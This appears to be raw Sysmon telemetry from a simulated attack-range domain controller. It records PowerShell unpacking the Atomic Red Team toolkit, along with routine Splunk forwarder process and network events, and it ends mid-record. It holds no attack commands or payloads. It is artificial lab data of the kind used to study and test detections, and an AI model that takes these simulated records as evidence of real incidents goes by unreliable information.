21:08:56.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic_red_team\atomic_test_template.yamlMD5=8B1B85D4D0EC0804B3293EB71F93AA27,SHA256=B173CFB3A886F4CB2619188C1C6950FE5491370EEA18430B465702C4418AE8E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic_red_team\atomic_red_team.rbMD5=4088F78EFB965F82F54598D896E2B6DF,SHA256=7BEDC14ECDCA5E1DA36B5146F4926F50CABF0F41EA9DCC4FDC63F3600EA20B69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic_red_team\atomic_execution_template.html.erbMD5=D4908B1E39CC61772E5D74E5FB77D241,SHA256=03626549A59ABF648EE59163B3B8ACBF66C36513CB1E76D6E277BC044C926E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic_red_team\atomic_doc_template.md.erbMD5=6099013F4F88B4DD2AE0D6D88EFF7329,SHA256=5A9261C1CEC37019CC4C57600B6E896BBD3232BED3C13710A3164155052E4C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\.github\pull_request_template.mdMD5=86EF896EED1FC3FB82AE37A48E4F8B88,SHA256=9E0B739CAAB0501BE480FECC661D313D1D4A90B41B09CC9C691D732C6E2DB636,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\.github\ISSUE_TEMPLATE\website_change.mdMD5=1DCAB611952C77BC668437CBC1CB4764,SHA256=F9FEF93C89EA99CF773046583A1A1397B7C3A8B8CACE303557002F16E594E84A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.326{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\.github\ISSUE_TEMPLATE\problem_report.mdMD5=A0F7603FCFB2D6D33C7EC6554403885A,SHA256=517D24689D745FAFFC6766A138B90C5864A8A490D7DA43978299F3D2ECC9B6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.326{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\.github\ISSUE_TEMPLATE\new_atomic.mdMD5=F458CFDF043720C5E1DEF577E50C9C6F,SHA256=4A7F665168CC3A1D94BB5E30A5F240E95B821170EC627FB20A690F0EEFD05305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.326{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\.github\ISSUE_TEMPLATE\idea.mdMD5=05897C3E94392BF4299FF1910CE41B9C,SHA256=1018F3AA597B70F05214DA4ED66C6646AAC5A7387D65FB37AC85344AC5E6E0A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.326{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\.circleci\config.ymlMD5=793F4A5543E5F5E049A2695117AB220E,SHA256=401A7E3CD9464CB7D8D97B659698FE0B280F99E6CDD33723FF625B4E0719D2EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.170{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=55374661A5968C3D1B4D7495C920F792,SHA256=B7170056DF6C7510DFA147B9E0801D45810F67FA5B0142F6A09D9F1E9B058C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.951{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5787D1D56D084DF74A47919257D1CD7,SHA256=D798C89242F2DC1F71C49B9F27DC1D6A040A13C46E0A7F0CCA37FD3F1D756661,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.888{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E9-60D3-2306-00000000CF01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.888{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.888{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.888{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.888{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.888{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2E9-60D3-2306-00000000CF01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.888{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E9-60D3-2306-00000000CF01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.889{4DB9351A-A2E9-60D3-2306-00000000CF01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.654{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00127E333864D3E52A49E09AB1D09B32,SHA256=CF70F04773464B1790E0062672F8188EE113141B0E31EB49D92399C4206BB080,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:57.150{4DB9351A-A2E8-60D3-2206-00000000CF01}50966520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:58.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8D062EF9FC6B2C5C55E8F26F7FBB6AF,SHA256=907137F8B82603BAAF48C5DB359CC6E1E24591E7E47EED4FBFDD27046D6108A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:58.091{4DB9351A-A2E9-60D3-2306-00000000CF01}70046368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000024634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:58.224{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61510-false10.0.1.12-8000- 23542300x800000000000000024633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.718{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85DDB2D52408C088E9BAF967706A534F,SHA256=EDF63671FB6718C25CC44F11AA8CAAAC61E95DDBB482BEEEB6B0094518A73CD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2EB-60D3-2406-00000000CF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2EB-60D3-2406-00000000CF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.591{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2EB-60D3-2406-00000000CF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:59.592{4DB9351A-A2EB-60D3-2406-00000000CF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.761{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02BB163634050013EF2B59A662C275E7,SHA256=B46464DB2901418698FB3DB38171DD83D3EBAE447680E3CB4FCB8A4B97C3A035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.736{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D3DD141F8D766FB0C3712967E158CD,SHA256=ACF52FF67BDA300389E0DDC19EC685E6B817BE19E697107F4F6C7F3DABD9AE17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:01.748{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38814B29284D23AB16AFD2F90EB7BE4,SHA256=C081827155B2550E0D25F08EBDE0FC180216382C12A5934E940F89B2FB780C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:02.765{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 